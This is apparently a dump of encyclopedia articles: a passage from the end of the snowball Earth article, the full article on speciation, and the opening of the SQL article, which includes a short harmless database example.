hypothesis A competing hypothesis to explain the presence of ice on the equatorial continents was that Earth's axial tilt was quite high, in the vicinity of 60°, which would place Earth's land in high "latitudes", although supporting evidence is scarce. A less extreme possibility would be that it was merely Earth's magnetic pole that wandered to this inclination, as the magnetic readings which suggested ice-covered continents depend on the magnetic and rotational poles being relatively similar. In either of these two situations, the freeze would be limited to relatively small areas, as is the case today; severe changes to Earth's climate are not necessary. Inertial interchange true polar wander The evidence for low-latitude glacial deposits during the supposed snowball Earth episodes has been reinterpreted via the concept of inertial interchange true polar wander. This hypothesis, created to explain palaeomagnetic data, suggests that Earth's orientation relative to its axis of rotation shifted one or more times during the general time-frame attributed to snowball Earth. This could feasibly produce the same distribution of glacial deposits without requiring any of them to have been deposited at equatorial latitude. While the physics behind the proposition is sound, the removal of one flawed data point from the original study rendered the application of the concept in these circumstances unwarranted. Survival of life through frozen periods A tremendous glaciation would curtail photosynthetic life on Earth, thus depleting atmospheric oxygen, and thereby allowing non-oxidized iron-rich rocks to form. Detractors argue that this kind of glaciation would have driven life entirely extinct. 
However, microfossils such as stromatolites and oncolites prove that, in shallow marine environments at least, life did not suffer any perturbation. Instead, life developed trophic complexity and survived the cold period unscathed. Proponents counter that it may have been possible for life to survive in these ways: In reservoirs of anaerobic and low-oxygen life powered by chemicals in deep oceanic hydrothermal vents, surviving in Earth's deep oceans and crust; photosynthesis, however, would not have been possible there. Under the ice layer, in chemolithotrophic (mineral-metabolizing) ecosystems theoretically resembling those in existence in modern glacier beds, high-alpine and Arctic talus permafrost, and basal glacial ice. This is especially plausible in areas of volcanism or geothermal activity. In pockets of liquid water within and under the ice caps, similar to Lake Vostok in Antarctica. In theory, this system may resemble microbial communities living in the perennially frozen lakes of the Antarctic dry valleys. Photosynthesis can occur under ice up to 20 m thick, and at the temperatures predicted by models, equatorial sublimation would prevent equatorial ice thickness from exceeding 10 m. As eggs and dormant cells and spores deep-frozen into ice during the most severe phases of the frozen period. In small regions of open sea water: polynyas. These natural ice holes can occur from the action of winds, currents or a local heat source (e.g. geothermal), even if the surrounding sea is completely frozen over. They could preserve enclaves of photosynthesizers (not multicellular plants, which did not yet exist) with access to light, allowing them to generate trace amounts of oxygen—enough to sustain some oxygen-dependent organisms. It is not necessary that a hole form in the ice, merely that some parts of the ice become thin enough to admit light. These small regions may have occurred in the deep ocean, far from Rodinia or its remnants as it broke apart and drifted on the tectonic plates. In layers of "dirty ice" on top of the ice sheet covering shallow seas below. Animals and mud from the sea would be frozen into the base of the ice and gradually concentrate on the top as the ice above sublimates. Small ponds of water would teem with life thanks to the flow of nutrients through the ice. Such environments may have covered approximately 12 per cent of the global surface area. In small oases of liquid water, as would be found near geothermal hotspots resembling Iceland today. In nunatak areas in the tropics, where daytime tropical sun or volcanic heat heated bare rock sheltered from cold wind and made small temporary melt pools, which would freeze at sunset. Oxygenated subglacial meltwater, along with iron-rich sediments dissolved in the glacial water, created a meltwater oxygen pump when it entered the ocean, where it provided eukaryotes with some oxygen, and both photosynthetic and chemosynthetic organisms with sufficient nutrients to support an ecosystem. The freshwater would also mix with the hypersaline seawater, creating areas less hostile to eukaryotic life than elsewhere in the ocean. However, organisms and ecosystems, as far as can be determined from the fossil record, do not appear to have undergone the significant change that would be expected from a mass extinction. With the advent of more precise dating, a phytoplankton extinction event which had been associated with snowball Earth was shown to precede glaciations by 16 million years. 
Even if life were to cling on in all the ecological refuges listed above, a whole-Earth glaciation would result in a biota with a noticeably different diversity and composition. This change in diversity and composition has not yet been observed—in fact, the organisms which should be most susceptible to climatic variation emerge unscathed from the snowball Earth. One rebuttal to this is that the Cryogenian fossil record is impoverished in many of the very places where such arguments against a snowball-driven mass extinction are made. Implications A snowball Earth has profound implications in the history of life on Earth. While many refugia have been postulated, global ice cover would certainly have ravaged ecosystems dependent on sunlight. Geochemical evidence from rocks associated with low-latitude glacial deposits has been interpreted to show a crash in oceanic life during the glacials. High-magnitude glacial retreats favoured the survival of macroalgae. Because about half of the oceans' water was frozen solid as ice, the remaining water would be twice as salty as it is today, lowering its freezing point. When the ice sheet melted under a hot atmosphere rich in carbon dioxide, it would cover the oceans with a layer of warm (50°C) freshwater up to 2 kilometres thick. Only after the warm surface water mixed with the colder and deeper saltwater did the sea return to a warmer and less salty state. The melting of the ice may have presented many new opportunities for diversification, and may indeed have driven the rapid evolution which took place at the end of the Cryogenian period. Global ice cover, if it existed, may—in concert with geothermal heating—have led to a lively, well-mixed ocean with great vertical convective circulation. Effect on early evolution The Neoproterozoic was a time of remarkable diversification of multicellular organisms, including animals. Organism size and complexity increased considerably after the end of the snowball glaciations. This rapid development of multicellular organisms may have been the result of increased evolutionary pressures resulting from multiple icehouse-hothouse cycles; in this sense, snowball Earth episodes may have "pumped" evolution, much as glaciations during the Pleistocene are known to have acted as a diversity pump in Antarctica. Alternatively, fluctuating copper levels and rising oxygen may have played a part. Many Sturtian diamictites unconformably overlie copper-mineralised strata in Greenland, North America, Australia, and Africa; the glacial breakup and erosion of rocks heavily enriched in copper during the Sturtian glaciation, combined with the chemical weathering of the Franklin Large Igneous Province, greatly elevated copper concentrations in the ocean. Because copper is an essential component of many proteins involved in mitigating oxygen toxicity, synthesising adenosine triphosphate, and producing elastin and collagen, among other biological functions, this spike in copper concentrations was essential to the explosive evolution of multicellular life throughout the latter portion of the Neoproterozoic. Elevated copper concentrations persisted into the Cambrian explosion at the beginning of the Phanerozoic and likely influenced its course too. One hypothesis that has been gaining currency in recent years is that early snowball Earths did not so much affect the evolution of life on Earth as result from it; in fact, the two hypotheses are not mutually exclusive. 
The idea is that Earth's life forms affect the global carbon cycle, and so major evolutionary events alter the carbon cycle, redistributing carbon within various reservoirs within the biosphere system and in the process temporarily lowering the atmospheric (greenhouse) carbon reservoir until the revised biosphere system settled into a new state. The cool period of the Huronian glaciation is speculated to be linked to the decline in the atmospheric content of greenhouse gases during the Great Oxygenation Event. Similarly, the possible snowball Earth of the Precambrian's Cryogenian between 580 and 850 million years ago (which itself had a number of distinct episodes) could be related to the rise of more advanced multicellular animal life and life's colonisation of the land. However, a 2022 study, based on findings of previous studies, suggested that land plant evolution was driven by the Cryogenian glaciations, which were also theorized to be the reason why the Zygnematophyceae (the sister group of land plants) became unicellular and cryophilic, lost their flagella and evolved sexual conjugation. Occurrence and timing Palaeoproterozoic The Snowball Earth hypothesis has been invoked to explain glacial deposits in the Huronian Supergroup of Canada, though the palaeomagnetic evidence that suggests ice sheets at low latitudes is contested, and stratigraphic evidence clearly shows only three distinct depositions of glacial material (the Ramsay, Bruce and Gowganda Formations) separated by significant periods without glacial deposition. The glacial sediments of the Makganyene formation of South Africa are slightly younger than the Huronian glacial deposits (~2.25 billion years old) and were possibly deposited at tropical latitudes. It has been proposed that the rise of free oxygen that occurred during the Great Oxygenation Event removed atmospheric methane through oxidation. As the solar irradiance was notably weaker at the time, Earth's climate may have relied on methane, a powerful greenhouse gas, to maintain surface temperatures above freezing. In the absence of this methane greenhouse, temperatures plunged and a global glaciation could have occurred between 2.5 and 2.2 Gya, during the Siderian and Rhyacian periods of the Paleoproterozoic era. Neoproterozoic There were three or four significant ice ages during the late Neoproterozoic. Of these, the Marinoan was the most severe, and the Sturtian glaciations were also widespread. Even the leading snowball proponent Hoffman agrees that the 350-thousand-year-long Gaskiers glaciation did not lead to global glaciation, although it was probably as intense as the late Ordovician glaciation. The status of the Kaigas "glaciation" or "cooling event" is currently unclear; some scientists do not recognise it as a glacial, others suspect that it may reflect poorly dated strata of Sturtian association, and others believe it may indeed be a third ice age. It was certainly less significant than the Sturtian or Marinoan glaciations, and probably not global in extent. Emerging evidence suggests that Earth underwent a number of glaciations during the Neoproterozoic, which would stand strongly at odds with the snowball hypothesis.
Physical sciences
Events
Earth science
29000
https://en.wikipedia.org/wiki/Speciation
Speciation
Speciation is the evolutionary process by which populations evolve to become distinct species. The biologist Orator F. Cook coined the term in 1906 for cladogenesis, the splitting of lineages, as opposed to anagenesis, phyletic evolution within lineages. Charles Darwin was the first to describe the role of natural selection in speciation in his 1859 book On the Origin of Species. He also identified sexual selection as a likely mechanism, but found it problematic. There are four geographic modes of speciation in nature, based on the extent to which speciating populations are isolated from one another: allopatric, peripatric, parapatric, and sympatric. Whether genetic drift is a minor or major contributor to speciation is the subject of much ongoing discussion. Rapid sympatric speciation can take place through polyploidy, such as by doubling of chromosome number; the result is progeny which are immediately reproductively isolated from the parent population. New species can also be created through hybridization, followed by reproductive isolation, if the hybrid is favoured by natural selection. Historical background In addressing the origin of species, there are two key issues: (1) the evolutionary mechanisms of speciation, and (2) how the separateness and individuality of species are maintained. Since Charles Darwin's time, efforts to understand the nature of species have primarily focused on the first aspect, and it is now widely agreed that the critical factor behind the origin of new species is reproductive isolation. Darwin's dilemma: why do species exist? In On the Origin of Species (1859), Darwin interpreted biological evolution in terms of natural selection, but was perplexed by the clustering of organisms into species. Chapter 6 of Darwin's book is entitled "Difficulties of the Theory". In discussing these "difficulties", he noted the puzzle of why, if species have descended from other species by fine gradations, we do not everywhere see innumerable transitional forms. This dilemma can be described as the absence or rarity of transitional varieties in habitat space. Another dilemma, related to the first one, is the absence or rarity of transitional varieties in time. Darwin pointed out that by the theory of natural selection "innumerable transitional forms must have existed", and wondered "why do we not find them embedded in countless numbers in the crust of the earth". That clearly defined species actually do exist in nature in both space and time implies that some fundamental feature of natural selection operates to generate and maintain species. Effect of sexual reproduction on species formation It has been argued that the resolution of Darwin's first dilemma lies in the fact that out-crossing sexual reproduction has an intrinsic cost of rarity. The cost of rarity arises as follows. If, on a resource gradient, a large number of separate species evolve, each exquisitely adapted to a very narrow band on that gradient, each species will, of necessity, consist of very few members. Finding a mate under these circumstances may present difficulties when many of the individuals in the neighborhood belong to other species. Under these circumstances, if any species' population size happens, by chance, to increase (at the expense of one or other of its neighboring species, if the environment is saturated), this will immediately make it easier for its members to find sexual partners. The members of the neighboring species, whose population sizes have decreased, experience greater difficulty in finding mates, and therefore form pairs less frequently than the larger species. 
This has a snowball effect, with large species growing at the expense of the smaller, rarer species, eventually driving them to extinction. Eventually, only a few species remain, each distinctly different from the others. Rarity not only imposes the risk of failure to find a mate, but may also incur indirect costs, such as the resources expended or risks taken to seek out a partner at low population densities.

Rarity brings other costs as well. Rare and unusual features are very seldom advantageous; in most instances, they indicate a (non-silent) mutation, which is almost certain to be deleterious. It therefore behooves sexual creatures to avoid mates sporting rare or unusual features (koinophilia). Sexual populations therefore rapidly shed rare or peripheral phenotypic features, thus canalizing the entire external appearance, as illustrated in the accompanying image of the African pygmy kingfisher, Ispidina picta. This uniformity of all the adult members of a sexual species has stimulated the proliferation of field guides on birds, mammals, reptiles, insects, and many other taxa, in which a species can be described with a single illustration (or two, in the case of sexual dimorphism). Once a population has become as homogeneous in appearance as is typical of most species (and is illustrated in the photograph of the African pygmy kingfisher), its members will avoid mating with members of other populations that look different from themselves. Thus, the avoidance of mates displaying rare and unusual phenotypic features inevitably leads to reproductive isolation, one of the hallmarks of speciation.

In the contrasting case of organisms that reproduce asexually, there is no cost of rarity; consequently, there are only benefits to fine-scale adaptation. Thus, asexual organisms very frequently show the continuous variation in form (often in many different directions) that Darwin expected evolution to produce, making their classification into "species" (more correctly, morphospecies) very difficult.

Modes
All forms of natural speciation have taken place over the course of evolution; however, debate persists as to the relative importance of each mechanism in driving biodiversity. One example of natural speciation is the diversity of the three-spined stickleback, a marine fish that, after the last glacial period, has undergone speciation into new freshwater colonies in isolated lakes and streams. Over an estimated 10,000 generations, the sticklebacks show structural differences that are greater than those seen between different genera of fish, including variations in fins, changes in the number or size of their bony plates, variable jaw structure, and color differences.

Allopatric
During allopatric (from the ancient Greek allos, "other" + patrā, "fatherland") speciation, a population splits into two geographically isolated populations (for example, by habitat fragmentation due to geographical change such as mountain formation). The isolated populations then undergo genotypic or phenotypic divergence as: (a) they become subjected to dissimilar selective pressures; (b) different mutations arise in the two populations. When the populations come back into contact, they have evolved such that they are reproductively isolated and are no longer capable of exchanging genes. Island genetics is the term associated with the tendency of small, isolated genetic pools to produce unusual traits. Examples include insular dwarfism and the radical changes among certain famous island chains, for example on Komodo.
The Galápagos Islands are particularly famous for their influence on Charles Darwin. During his five weeks there he heard that Galápagos tortoises could be identified by island, and noticed that finches differed from one island to another, but it was only nine months later that he speculated that such facts could show that species were changeable. When he returned to England, his speculation on evolution deepened after experts informed him that these were separate species, not just varieties, and famously that other differing Galápagos birds were all species of finches. Though the finches were less important for Darwin, more recent research has shown the birds now known as Darwin's finches to be a classic case of adaptive evolutionary radiation.

Peripatric
In peripatric speciation, a subform of allopatric speciation, new species are formed in isolated, smaller peripheral populations that are prevented from exchanging genes with the main population. It is related to the concept of a founder effect, since small populations often undergo bottlenecks. Genetic drift is often proposed to play a significant role in peripatric speciation. Case studies include Mayr's investigation of bird fauna; the Australian bird Petroica multicolor; and reproductive isolation in populations of Drosophila subject to population bottlenecking.

Parapatric
In parapatric speciation, there is only partial separation of the zones of two diverging populations afforded by geography; individuals of each species may come in contact or cross habitats from time to time, but reduced fitness of the heterozygote leads to selection for behaviours or mechanisms that prevent their interbreeding. Parapatric speciation is modelled on continuous variation within a "single", connected habitat acting as a source of natural selection rather than the effects of isolation of habitats produced in peripatric and allopatric speciation.

Parapatric speciation may be associated with differential landscape-dependent selection. Even if there is gene flow between two populations, strong differential selection may impede assimilation and different species may eventually develop. Habitat differences may be more important in the development of reproductive isolation than the isolation time. Among the Caucasian rock lizards Darevskia rudis, D. valentini and D. portschinskii, all of which hybridize with each other in their hybrid zones, hybridization is stronger between D. portschinskii and D. rudis, which separated earlier but live in similar habitats, than between D. valentini and the other two species, which separated later but live in climatically different habitats.

Ecologists refer to parapatric and peripatric speciation in terms of ecological niches. A niche must be available in order for a new species to be successful. Ring species such as Larus gulls have been claimed to illustrate speciation in progress, though the situation may be more complex. The grass Anthoxanthum odoratum may be starting parapatric speciation in areas of mine contamination.

Sympatric
Sympatric speciation is the formation of two or more descendant species from a single ancestral species all occupying the same geographic location. Often-cited examples of sympatric speciation are found in insects that become dependent on different host plants in the same area. The best-known example of sympatric speciation is that of the cichlids of East Africa inhabiting the Rift Valley lakes, particularly Lake Victoria, Lake Malawi and Lake Tanganyika.
There are over 800 described species, and according to estimates, there could be well over 1,600 species in the region. Their evolution is cited as an example of both natural and sexual selection. A 2008 study suggests that sympatric speciation has occurred in Tennessee cave salamanders. Sympatric speciation driven by ecological factors may also account for the extraordinary diversity of crustaceans living in the depths of Siberia's Lake Baikal.

Budding speciation has been proposed as a particular form of sympatric speciation, whereby small groups of individuals become progressively more isolated from the ancestral stock by breeding preferentially with one another. This type of speciation would be driven by the conjunction of various advantages of inbreeding, such as the expression of advantageous recessive phenotypes, reducing the recombination load, and reducing the cost of sex.

The hawthorn fly (Rhagoletis pomonella), also known as the apple maggot fly, appears to be undergoing sympatric speciation. Different populations of hawthorn fly feed on different fruits. A distinct population emerged in North America in the 19th century some time after apples, a non-native species, were introduced. This apple-feeding population normally feeds only on apples and not on the historically preferred fruit of hawthorns. The current hawthorn-feeding population does not normally feed on apples. Several lines of evidence suggest that sympatric speciation is occurring: six out of thirteen allozyme loci differ between the populations; hawthorn flies mature later in the season and take longer to mature than apple flies; and there is little evidence of interbreeding (researchers have documented a 4–6% hybridization rate).

Methods of selection

Reinforcement
Reinforcement, also called the Wallace effect, is the process by which natural selection increases reproductive isolation. It may occur after two populations of the same species are separated and then come back into contact. If their reproductive isolation was complete, then they will have already developed into two separate incompatible species. If their reproductive isolation is incomplete, then further mating between the populations will produce hybrids, which may or may not be fertile. If the hybrids are infertile, or fertile but less fit than their ancestors, then there will be further reproductive isolation and speciation has essentially occurred, as in horses and donkeys. One rationale behind this is that if the parents of the hybrid offspring each have naturally selected traits for their own certain environments, the hybrid offspring will bear traits from both, and therefore would not fit either ecological niche as well as either parent (ecological speciation). The low fitness of the hybrids would cause selection to favor assortative mating, which would control hybridization. This is sometimes called the Wallace effect after the evolutionary biologist Alfred Russel Wallace, who suggested in the late 19th century that it might be an important factor in speciation. Conversely, if the hybrid offspring are more fit than their ancestors, then the populations will merge back into the same species within the area they are in contact.

Another important theoretical mechanism is the emergence of intrinsic genetic incompatibilities, addressed in the Bateson–Dobzhansky–Muller model.
Genes from allopatric populations have different evolutionary backgrounds and are never tested together until hybridization at secondary contact, when negative epistatic interactions are exposed. In other words, new alleles will emerge in a population and pass through selection only if they work well together with other genes in the same population, but they may not be compatible with genes in an allopatric population, be those other newly derived alleles or retained ancestral alleles. This is only revealed through hybridization. Such incompatibilities cause lower fitness in hybrids regardless of the ecological environment, and are thus intrinsic, although they can originate from adaptation to different environments. The accumulation of such incompatibilities increases faster and faster with time, creating a "snowball" effect. There is a large amount of evidence supporting this theory, primarily from laboratory populations such as Drosophila and Mus, and some genes involved in incompatibilities have been identified.

Reinforcement favoring reproductive isolation is required for both parapatric and sympatric speciation. Without reinforcement, the geographic area of contact between different forms of the same species, called their "hybrid zone", will not develop into a boundary between the different species. Hybrid zones are regions where diverged populations meet and interbreed. Hybrid offspring are common in these regions, which are usually created by diverged species coming into secondary contact. Without reinforcement, the two species would interbreed uncontrollably. Reinforcement may be induced in artificial selection experiments, as described below.

Ecological
Ecological selection is "the interaction of individuals with their environment during resource acquisition". Natural selection is inherently involved in the process of speciation, whereby, "under ecological speciation, populations in different environments, or populations exploiting different resources, experience contrasting natural selection pressures on the traits that directly or indirectly bring about the evolution of reproductive isolation". Evidence for the role ecology plays in the process of speciation exists. Studies of stickleback populations support ecologically-linked speciation arising as a by-product, alongside numerous studies of parallel speciation, in which isolation evolves more readily between independent populations adapting to contrasting environments than between independent populations adapting to similar environments. Much of the evidence for ecological speciation has "...accumulated from top-down studies of adaptation and reproductive isolation".

Sexual selection
Sexual selection can drive speciation in a clade, independently of natural selection. However, the term "speciation", in this context, tends to be used in two different, but not mutually exclusive, senses. The first and most commonly used sense refers to the "birth" of new species: that is, the splitting of an existing species into two separate species, or the budding off of a new species from a parent species, both driven by a biological "fashion fad" (a preference for a feature, or features, in one or both sexes, that do not necessarily have any adaptive qualities).
In the second sense, "speciation" refers to the wide-spread tendency of sexual creatures to be grouped into clearly defined species, rather than forming a continuum of phenotypes both in time and space – which would be the more obvious or logical consequence of natural selection. This was indeed recognized by Darwin as problematic, and included in his On the Origin of Species (1859), under the heading "Difficulties of the Theory". There are several suggestions as to how mate choice might play a significant role in resolving Darwin's dilemma. If speciation takes place in the absence of natural selection, it might be referred to as nonecological speciation.

Artificial speciation
New species have been created by animal husbandry, but the dates and methods of the initiation of such species are not clear. Often, the domestic counterpart can still interbreed and produce fertile offspring with its wild ancestor. This is the case with domestic cattle, which can be considered the same species as several varieties of wild ox, gaur, and yak; and with domestic sheep, which can interbreed with the mouflon.

The best-documented creations of new species in the laboratory were performed in the late 1980s. William R. Rice and George W. Salt bred Drosophila melanogaster fruit flies using a maze with three different choices of habitat, such as light/dark and wet/dry. Each generation was placed into the maze, and the groups of flies that came out of two of the eight exits were set apart to breed with each other in their respective groups. After thirty-five generations, the two groups and their offspring were isolated reproductively because of their strong habitat preferences: they mated only within the areas they preferred, and so did not mate with flies that preferred the other areas. The history of such attempts is described by Rice and Ellen E. Hostert (1993). Diane Dodd used a laboratory experiment to show how reproductive isolation can develop in Drosophila pseudoobscura fruit flies after several generations by placing them in different media, starch- and maltose-based media.

Dodd's experiment has been replicated many times, including with other kinds of fruit flies and foods. Such rapid evolution of reproductive isolation may sometimes be a relic of infection by Wolbachia bacteria. An alternative explanation is that these observations are consistent with sexually-reproducing animals being inherently reluctant to mate with individuals whose appearance or behavior is different from the norm. The risk that such deviations are due to heritable maladaptations is high. Thus, if an animal, unable to predict natural selection's future direction, is conditioned to produce the fittest offspring possible, it will avoid mates with unusual habits or features. Sexual creatures then inevitably group themselves into reproductively isolated species.

Genetics
Few speciation genes have been found. They usually involve the reinforcement process of late stages of speciation. In 2008, a speciation gene causing reproductive isolation was reported. It causes hybrid sterility between related subspecies. The order of speciation of three groups from a common ancestor may be unclear or unknown; a collection of three such species is referred to as a "trichotomy".

Speciation via polyploidy
Polyploidy is a mechanism that has caused many rapid speciation events in sympatry because offspring of, for example, tetraploid x diploid matings often result in triploid sterile progeny.
However, among plants, not all polyploids are reproductively isolated from their parents, and gene flow may still occur, such as through triploid hybrid x diploid matings that produce tetraploids, or matings between meiotically unreduced gametes from diploids and gametes from tetraploids (see also hybrid speciation). It has been suggested that many of the existing plant species and most animal species have undergone an event of polyploidization in their evolutionary history. Reproduction of successful polyploid species is sometimes asexual, by parthenogenesis or apomixis, as for unknown reasons many asexual organisms are polyploid. Rare instances of polyploid mammals are known, but most often result in prenatal death.

Hybrid speciation
Hybridization between two different species sometimes leads to a distinct phenotype. This phenotype can also be fitter than the parental lineage, and as such natural selection may then favor these individuals. Eventually, if reproductive isolation is achieved, it may lead to a separate species. However, reproductive isolation between hybrids and their parents is particularly difficult to achieve, and thus hybrid speciation is considered an extremely rare event. The Mariana mallard is thought to have arisen from hybrid speciation.

Hybridization is an important means of speciation in plants, since polyploidy (having more than two copies of each chromosome) is tolerated in plants more readily than in animals. Polyploidy is important in hybrids as it allows reproduction, with the two different sets of chromosomes each being able to pair with an identical partner during meiosis. Polyploids also have more genetic diversity, which allows them to avoid inbreeding depression in small populations. Hybridization without change in chromosome number is called homoploid hybrid speciation. It is considered very rare but has been shown in Heliconius butterflies and sunflowers. Polyploid speciation, which involves changes in chromosome number, is a more common phenomenon, especially in plant species.

Gene transposition
Theodosius Dobzhansky, who studied fruit flies in the early days of genetic research in the 1930s, speculated that parts of chromosomes that switch from one location to another might cause a species to split into two different species. He mapped out how it might be possible for sections of chromosomes to relocate themselves in a genome. Those mobile sections can cause sterility in inter-species hybrids, which can act as a speciation pressure. In theory, his idea was sound, but scientists long debated whether it actually happened in nature. Eventually a competing theory involving the gradual accumulation of mutations was shown to occur in nature so often that geneticists largely dismissed the moving-gene hypothesis. However, research in 2006 showed that jumping of a gene from one chromosome to another can contribute to the birth of new species. This validates the reproductive isolation mechanism, a key component of speciation.

Rates
There is debate as to the rate at which speciation events occur over geologic time. While some evolutionary biologists claim that speciation events have remained relatively constant and gradual over time (known as "phyletic gradualism" – see diagram), some palaeontologists such as Niles Eldredge and Stephen Jay Gould have argued that species usually remain unchanged over long stretches of time, and that speciation occurs only over relatively brief intervals, a view known as punctuated equilibrium. (See diagram, and Darwin's dilemma.)
Punctuated evolution
Evolution can be extremely rapid, as shown in the creation of domesticated animals and plants in a very short geological space of time, spanning only a few tens of thousands of years. Maize (Zea mays), for instance, was created in Mexico in only a few thousand years, starting about 7,000 to 12,000 years ago. This raises the question of why the long-term rate of evolution is far slower than is theoretically possible.

Evolution is imposed on species or groups. It is not planned or striven for in some Lamarckist way. The mutations on which the process depends are random events, and, except for the "silent mutations" which do not affect the functionality or appearance of the carrier, are thus usually disadvantageous, and their chance of proving to be useful in the future is vanishingly small. Therefore, while a species or group might benefit from being able to adapt to a new environment by accumulating a wide range of genetic variation, this is to the detriment of the individuals who have to carry these mutations until a small, unpredictable minority of them ultimately contributes to such an adaptation. Thus, the capability to evolve would require group selection, a concept discredited by (for example) George C. Williams, John Maynard Smith and Richard Dawkins as selectively disadvantageous to the individual.

The resolution to Darwin's second dilemma might thus come about as follows: if sexual individuals are disadvantaged by passing mutations on to their offspring, they will avoid mutant mates with strange or unusual characteristics. Mutations that affect the external appearance of their carriers will then rarely be passed on to the next and subsequent generations. They would therefore seldom be tested by natural selection. Evolution is, therefore, effectively halted or slowed down considerably. The only mutations that can accumulate in a population, on this punctuated equilibrium view, are ones that have no noticeable effect on the outward appearance and functionality of their bearers (i.e., they are "silent" or "neutral" mutations, which can be, and are, used to trace the relatedness and age of populations and species).

This argument implies that evolution can only occur if mutant mates cannot be avoided, as a result of a severe scarcity of potential mates. This is most likely to occur in small, isolated communities. These occur most commonly on small islands, in remote valleys, lakes, river systems, or caves, or during the aftermath of a mass extinction. Under these circumstances, not only is the choice of mates severely restricted but population bottlenecks, founder effects, genetic drift and inbreeding cause rapid, random changes in the isolated population's genetic composition. Furthermore, hybridization with a related species trapped in the same isolate might introduce additional genetic changes. If an isolated population such as this survives its genetic upheavals, and subsequently expands into an unoccupied niche, or into a niche in which it has an advantage over its competitors, a new species, or subspecies, will have come into being. In geological terms, this will be an abrupt event. A resumption of avoiding mutant mates will thereafter result, once again, in evolutionary stagnation.
In apparent confirmation of this punctuated equilibrium view of evolution, the fossil record of an evolutionary progression typically consists of species that suddenly appear, and ultimately disappear, hundreds of thousands or millions of years later, without any change in external appearance. Graphically, these fossil species are represented by lines parallel with the time axis, whose lengths depict how long each of them existed. The fact that the lines remain parallel with the time axis illustrates the unchanging appearance of each of the fossil species depicted on the graph. During each species' existence new species appear at random intervals, each also lasting many hundreds of thousands of years before disappearing without a change in appearance. The exact relatedness of these concurrent species is generally impossible to determine. This is illustrated in the diagram depicting the distribution of hominin species through time since the hominins separated from the line that led to the evolution of their closest living primate relatives, the chimpanzees. For similar evolutionary time lines see, for instance, the paleontological list of African dinosaurs, Asian dinosaurs, the Lampriformes and Amiiformes.
Biology and health sciences
Basics_4
Biology
29004
https://en.wikipedia.org/wiki/SQL
SQL
Structured Query Language (SQL) (pronounced S-Q-L; or alternatively as "sequel") is a domain-specific language used to manage data, especially in a relational database management system (RDBMS). It is particularly useful in handling structured data, i.e., data incorporating relations among entities and variables.

Introduced in the 1970s, SQL offered two main advantages over older read–write APIs such as ISAM or VSAM. Firstly, it introduced the concept of accessing many records with one single command. Secondly, it eliminated the need to specify how to reach a record, i.e., with or without an index.

Originally based upon relational algebra and tuple relational calculus, SQL consists of many types of statements, which may be informally classed as sublanguages, commonly: Data Query Language (DQL), Data Definition Language (DDL), Data Control Language (DCL), and Data Manipulation Language (DML). The scope of SQL includes data query, data manipulation (insert, update, and delete), data definition (schema creation and modification), and data access control. Although SQL is essentially a declarative language (4GL), it also includes procedural elements.

SQL was one of the first commercial languages to use Edgar F. Codd's relational model. The model was described in his influential 1970 paper, "A Relational Model of Data for Large Shared Data Banks". Despite not entirely adhering to the relational model as described by Codd, SQL became the most widely used database language.

SQL became a standard of the American National Standards Institute (ANSI) in 1986 and of the International Organization for Standardization (ISO) in 1987. Since then, the standard has been revised multiple times to include a larger set of features and incorporate common extensions. Despite the existence of standards, virtually no implementations adhere to the standard fully, and most SQL code requires at least some changes before being ported to different database systems.
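The four sublanguages mentioned above can be illustrated with a minimal sketch using Python's built-in sqlite3 module. The table and data are illustrative only, and since SQLite implements no access-control statements, the DCL example appears only as a comment:

    # A minimal sketch of the four informal SQL sublanguages via sqlite3.
    import sqlite3

    conn = sqlite3.connect(":memory:")

    # DDL (Data Definition Language): define a schema object.
    conn.execute("CREATE TABLE employee (id INTEGER PRIMARY KEY, name TEXT, salary NUMERIC)")

    # DML (Data Manipulation Language): insert and update rows.
    conn.execute("INSERT INTO employee (name, salary) VALUES ('Ada', 120000)")
    conn.execute("UPDATE employee SET salary = 125000 WHERE name = 'Ada'")

    # DQL (Data Query Language): retrieve many rows with one declarative command.
    for row in conn.execute("SELECT id, name, salary FROM employee"):
        print(row)  # (1, 'Ada', 125000)

    # DCL (Data Control Language) governs access rights, e.g.:
    #   GRANT SELECT ON employee TO some_user;
    # SQLite has no user management, so the statement is shown only as a comment.
    conn.close()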
History
SQL was initially developed at IBM by Donald D. Chamberlin and Raymond F. Boyce after they learned about the relational model from Edgar F. Codd in the early 1970s. This version, initially called SEQUEL (Structured English Query Language), was designed to manipulate and retrieve data stored in IBM's original quasirelational database management system, System R, which a group at the IBM San Jose Research Laboratory had developed during the 1970s.

Chamberlin and Boyce's first attempt at a relational database language was SQUARE (Specifying Queries in A Relational Environment), but it was difficult to use due to its subscript/superscript notation. After moving to the San Jose Research Laboratory in 1973, they began work on a sequel to SQUARE. The original name SEQUEL, which is widely regarded as a pun on QUEL, the query language of Ingres, was later changed to SQL (dropping the vowels) because "SEQUEL" was a trademark of the UK-based Hawker Siddeley Dynamics Engineering Limited company. The label SQL later became the acronym for Structured Query Language.

After testing SQL at customer test sites to determine the usefulness and practicality of the system, IBM began developing commercial products based on their System R prototype, including System/38, SQL/DS, and IBM Db2, which were commercially available in 1979, 1981, and 1983, respectively.

In the late 1970s, Relational Software, Inc. (now Oracle Corporation) saw the potential of the concepts described by Codd, Chamberlin, and Boyce, and developed their own SQL-based RDBMS with aspirations of selling it to the U.S. Navy, Central Intelligence Agency, and other U.S. government agencies. In June 1979, Relational Software introduced one of the first commercially available implementations of SQL, Oracle V2 (Version 2) for VAX computers.

By 1986, ANSI and ISO standard groups officially adopted the standard "Database Language SQL" language definition. New versions of the standard were published in 1989, 1992, 1996, 1999, 2003, 2006, 2008, 2011, 2016 and, most recently, 2023.

Syntax
The SQL language is subdivided into several language elements, including:
Clauses, which are constituent components of statements and queries (in some cases, these are optional)
Expressions, which can produce either scalar values, or tables consisting of columns and rows of data
Predicates, which specify conditions that can be evaluated to SQL three-valued logic (3VL) (true/false/unknown) or Boolean truth values, and are used to limit the effects of statements and queries, or to change program flow
Queries, which retrieve the data based on specific criteria; this is an important element of SQL
Statements, which may have a persistent effect on schemata and data, or may control transactions, program flow, connections, sessions, or diagnostics
SQL statements also include the semicolon (";") statement terminator. Though not required on every platform, it is defined as a standard part of the SQL grammar. Insignificant whitespace is generally ignored in SQL statements and queries, making it easier to format SQL code for readability.

Procedural extensions
